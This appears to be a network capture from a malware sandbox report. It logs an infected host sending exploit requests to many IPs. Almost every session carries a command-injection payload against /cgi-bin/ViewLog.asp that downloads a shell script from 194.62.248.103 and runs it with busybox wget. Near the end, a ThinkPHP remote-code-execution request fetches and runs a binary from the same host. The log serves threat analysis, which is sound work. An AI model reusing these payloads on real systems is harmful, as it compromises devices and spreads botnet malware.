                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:40.119971037 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:44.471241951 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:52.917915106 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:10.067636967 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:44.878815889 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        634192.168.2.233380694.122.90.1338080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:36.192540884 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        635192.168.2.235602895.72.216.1408080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:36.198533058 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        636192.168.2.233912894.120.96.88080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:36.204793930 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        637192.168.2.234449094.122.95.828080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:36.211105108 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        638192.168.2.234488295.86.82.2028080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:36.219053984 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        639192.168.2.233828895.154.106.578080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:36.265099049 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:36.677782059 CEST517INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:38:46 GMT
                                                        Server: Apache/2.4.57 (Win64)
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        640192.168.2.233489431.136.157.978080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:37.522082090 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:40.631860971 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:46.774832964 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:58.805150986 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:24.401590109 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:13.546992064 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        641192.168.2.234718694.122.230.1068080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:37.551717997 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        642192.168.2.233523031.200.105.2498080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:37.552470922 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        643192.168.2.233421494.120.107.2308080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:37.556956053 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        644192.168.2.234093495.108.13.2338080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:37.856137037 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        645192.168.2.234382494.123.41.638080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:37.861996889 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        646192.168.2.234188694.123.247.1178080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:37.862114906 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        647192.168.2.233550688.213.248.17380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:38.054987907 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:38.372082949 CEST515INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:38 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: frame-ancestors 'self'
                                                        X-XSS-Protection: 1; mode=block
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
                                                        Apr 14, 2024 16:36:39.285439968 CEST515INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:38 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: frame-ancestors 'self'
                                                        X-XSS-Protection: 1; mode=block
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        648192.168.2.233910088.221.16.22680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:38.055618048 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:38.372262001 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:36:38 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:38 GMT
                                                        Connection: close
